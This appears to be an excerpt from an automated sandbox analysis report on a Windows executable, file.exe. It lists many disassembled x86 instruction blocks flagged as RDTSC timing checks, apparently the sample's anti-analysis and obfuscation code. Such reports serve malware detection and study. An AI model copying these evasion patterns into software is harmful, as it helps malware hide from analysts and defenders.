          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C207AF second address: 4C20855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F17414E3401h 0x00000009 sub esi, 6E554E46h 0x0000000f jmp 00007F17414E3401h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F17414E3400h 0x0000001b sub ax, 12E8h 0x00000020 jmp 00007F17414E33FBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 cmp dword ptr [ebp-04h], 00000000h 0x0000002d jmp 00007F17414E3406h 0x00000032 mov esi, eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 push edx 0x00000038 pop eax 0x00000039 pushfd 0x0000003a jmp 00007F17414E3409h 0x0000003f sbb eax, 02922A66h 0x00000045 jmp 00007F17414E3401h 0x0000004a popfd 0x0000004b popad 0x0000004c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2000B second address: 4C20010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20010 second address: 4C20029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17414E3405h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20029 second address: 4C2004D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F174075FE89h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2004D second address: 4C20070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov edi, 5A05CDFEh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F17414E3400h 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20070 second address: 4C20098 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F174075FE85h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20098 second address: 4C2009E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2009E second address: 4C200A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C200A2 second address: 4C200D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3403h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push FFFFFFFEh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F17414E3405h 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C200D4 second address: 4C200DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C200DA second address: 4C200DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C200DE second address: 4C2018E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 4EC1137Ah 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F174075FE82h 0x00000014 or ecx, 4D9C9418h 0x0000001a jmp 00007F174075FE7Bh 0x0000001f popfd 0x00000020 mov ax, 2FCFh 0x00000024 popad 0x00000025 add dword ptr [esp], 27D98ACEh 0x0000002c pushad 0x0000002d jmp 00007F174075FE80h 0x00000032 mov bx, si 0x00000035 popad 0x00000036 call 00007F174075FE79h 0x0000003b pushad 0x0000003c movsx ebx, si 0x0000003f popad 0x00000040 push eax 0x00000041 jmp 00007F174075FE7Bh 0x00000046 mov eax, dword ptr [esp+04h] 0x0000004a jmp 00007F174075FE89h 0x0000004f mov eax, dword ptr [eax] 0x00000051 jmp 00007F174075FE81h 0x00000056 mov dword ptr [esp+04h], eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F174075FE7Ch 0x00000061 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2018E second address: 4C201C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E33FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F17414E3406h 0x0000000f mov eax, dword ptr fs:[00000000h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C201C0 second address: 4C201C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C201C4 second address: 4C201CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C201CA second address: 4C201F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F174075FE7Ah 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C201F1 second address: 4C20200 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E33FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20200 second address: 4C20207 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 9Dh 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20207 second address: 4C2027E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F17414E3407h 0x0000000d nop 0x0000000e jmp 00007F17414E3406h 0x00000013 sub esp, 18h 0x00000016 jmp 00007F17414E3400h 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F17414E33FEh 0x00000023 xor eax, 40381178h 0x00000029 jmp 00007F17414E33FBh 0x0000002e popfd 0x0000002f movzx ecx, bx 0x00000032 popad 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2027E second address: 4C20284 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20284 second address: 4C20305 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3406h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F17414E3400h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 push esi 0x00000012 pop edi 0x00000013 movzx esi, bx 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 push ecx 0x0000001a mov ecx, ebx 0x0000001c pop edx 0x0000001d mov bx, si 0x00000020 popad 0x00000021 xchg eax, esi 0x00000022 pushad 0x00000023 call 00007F17414E33FEh 0x00000028 mov ebx, esi 0x0000002a pop ecx 0x0000002b push ebx 0x0000002c pop edi 0x0000002d popad 0x0000002e xchg eax, edi 0x0000002f pushad 0x00000030 call 00007F17414E3402h 0x00000035 push ecx 0x00000036 pop edi 0x00000037 pop eax 0x00000038 pushad 0x00000039 mov dx, 9E40h 0x0000003d mov edx, 65E45E6Ch 0x00000042 popad 0x00000043 popad 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 mov cx, bx 0x0000004b mov cx, dx 0x0000004e popad 0x0000004f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20305 second address: 4C2030B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2030B second address: 4C2034E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E33FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c jmp 00007F17414E3400h 0x00000011 mov eax, dword ptr [769B4538h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F17414E3407h 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2034E second address: 4C2041A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c jmp 00007F174075FE7Eh 0x00000011 xor eax, ebp 0x00000013 jmp 00007F174075FE81h 0x00000018 nop 0x00000019 jmp 00007F174075FE7Eh 0x0000001e push eax 0x0000001f jmp 00007F174075FE7Bh 0x00000024 nop 0x00000025 jmp 00007F174075FE86h 0x0000002a lea eax, dword ptr [ebp-10h] 0x0000002d pushad 0x0000002e pushad 0x0000002f mov al, 0Dh 0x00000031 pushad 0x00000032 popad 0x00000033 popad 0x00000034 jmp 00007F174075FE7Fh 0x00000039 popad 0x0000003a mov dword ptr fs:[00000000h], eax 0x00000040 jmp 00007F174075FE86h 0x00000045 mov dword ptr [ebp-18h], esp 0x00000048 pushad 0x00000049 mov ax, CB0Dh 0x0000004d mov cx, 0B09h 0x00000051 popad 0x00000052 mov eax, dword ptr fs:[00000018h] 0x00000058 pushad 0x00000059 mov al, bl 0x0000005b popad 0x0000005c mov ecx, dword ptr [eax+00000FDCh] 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2041A second address: 4C2041E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2041E second address: 4C20422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20422 second address: 4C20428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20428 second address: 4C2045B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov bx, EFA0h 0x00000012 jmp 00007F174075FE89h 0x00000017 popad 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2045B second address: 4C20485 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3401h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F17414E3445h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F17414E33FDh 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20485 second address: 4C2048B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2048B second address: 4C204F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add eax, ecx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F17414E3405h 0x00000011 and esi, 275A8966h 0x00000017 jmp 00007F17414E3401h 0x0000001c popfd 0x0000001d popad 0x0000001e mov ecx, dword ptr [ebp+08h] 0x00000021 pushad 0x00000022 jmp 00007F17414E3403h 0x00000027 mov dx, cx 0x0000002a popad 0x0000002b test ecx, ecx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F17414E33FCh 0x00000036 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C204F2 second address: 4C20501 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20501 second address: 4C20519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17414E3404h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C101CE second address: 4C101E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F174075FE84h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C101E6 second address: 4C1020B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F17414E3408h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1020B second address: 4C1021A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1021A second address: 4C1027E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F17414E33FFh 0x00000009 xor ax, 04AEh 0x0000000e jmp 00007F17414E3409h 0x00000013 popfd 0x00000014 call 00007F17414E3400h 0x00000019 pop esi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e jmp 00007F17414E3401h 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov dx, 0F6Eh 0x0000002c mov ecx, edi 0x0000002e popad 0x0000002f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1027E second address: 4C102DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F174075FE7Eh 0x00000009 sbb ax, 1BB8h 0x0000000e jmp 00007F174075FE7Bh 0x00000013 popfd 0x00000014 movzx ecx, bx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a sub esp, 2Ch 0x0000001d pushad 0x0000001e mov esi, edx 0x00000020 jmp 00007F174075FE7Dh 0x00000025 popad 0x00000026 xchg eax, ebx 0x00000027 jmp 00007F174075FE7Eh 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F174075FE7Eh 0x00000034 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C102DB second address: 4C10302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E33FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F17414E3405h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10302 second address: 4C10307 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10307 second address: 4C1030D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1030D second address: 4C1031B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1031B second address: 4C1031F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1031F second address: 4C10325 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1038E second address: 4C103CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushfd 0x00000007 jmp 00007F17414E3405h 0x0000000c adc ax, 6E96h 0x00000011 jmp 00007F17414E3401h 0x00000016 popfd 0x00000017 popad 0x00000018 popad 0x00000019 inc ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C103CA second address: 4C103CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C103CE second address: 4C103D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1048F second address: 4C10493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10493 second address: 4C10499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10527 second address: 4C1052B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1052B second address: 4C10571 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 test eax, eax 0x0000000a jmp 00007F17414E33FFh 0x0000000f jg 00007F17B323133Eh 0x00000015 jmp 00007F17414E3406h 0x0000001a js 00007F17414E3467h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov bx, 8C90h 0x00000027 movsx edx, si 0x0000002a popad 0x0000002b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10571 second address: 4C10583 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F174075FE7Eh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10583 second address: 4C105C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-14h], edi 0x0000000b jmp 00007F17414E3407h 0x00000010 jne 00007F17B32312ECh 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F17414E3405h 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C105C2 second address: 4C10614 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F174075FE83h 0x00000015 add esi, 1F0A365Eh 0x0000001b jmp 00007F174075FE89h 0x00000020 popfd 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10614 second address: 4C1061A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1061A second address: 4C1061E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1061E second address: 4C1063B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-2Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F17414E3400h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1063B second address: 4C1069E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F174075FE81h 0x00000009 or ch, FFFFFFF6h 0x0000000c jmp 00007F174075FE81h 0x00000011 popfd 0x00000012 movzx eax, bx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push esp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov edx, 3DF68F18h 0x00000021 pushfd 0x00000022 jmp 00007F174075FE81h 0x00000027 or si, 2206h 0x0000002c jmp 00007F174075FE81h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1069E second address: 4C106C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3401h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F17414E33FDh 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C106C5 second address: 4C106CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C106CB second address: 4C106CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C106CF second address: 4C106F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d mov esi, 14DD3A9Bh 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C106F2 second address: 4C1073B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F17414E3403h 0x0000000c nop 0x0000000d jmp 00007F17414E3406h 0x00000012 xchg eax, ebx 0x00000013 jmp 00007F17414E3400h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1073B second address: 4C1073F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1073F second address: 4C1075B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3408h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C107AC second address: 4C10019 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F174075FE88h 0x00000008 adc ch, 00000078h 0x0000000b jmp 00007F174075FE7Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 movzx ecx, dx 0x00000016 popad 0x00000017 je 00007F17B24ADCEFh 0x0000001d xor eax, eax 0x0000001f jmp 00007F17407395AAh 0x00000024 pop esi 0x00000025 pop edi 0x00000026 pop ebx 0x00000027 leave 0x00000028 retn 0004h 0x0000002b nop 0x0000002c sub esp, 04h 0x0000002f mov esi, eax 0x00000031 cmp esi, 00000000h 0x00000034 setne al 0x00000037 xor ebx, ebx 0x00000039 test al, 01h 0x0000003b jne 00007F174075FE77h 0x0000003d jmp 00007F174075FF7Fh 0x00000042 call 00007F17449DB895h 0x00000047 mov edi, edi 0x00000049 pushad 0x0000004a mov cx, 6AEDh 0x0000004e jmp 00007F174075FE7Ah 0x00000053 popad 0x00000054 xchg eax, ebp 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10019 second address: 4C1001D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1001D second address: 4C10021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10021 second address: 4C10027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10027 second address: 4C10050 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F174075FE82h 0x00000009 sbb cx, 3CE8h 0x0000000e jmp 00007F174075FE7Bh 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10050 second address: 4C1006C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov di, ax 0x0000000e call 00007F17414E33FCh 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1006C second address: 4C1008F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F174075FE7Ah 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1008F second address: 4C1009E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E33FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1009E second address: 4C100B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F174075FE84h 0x00000009 rdtsc
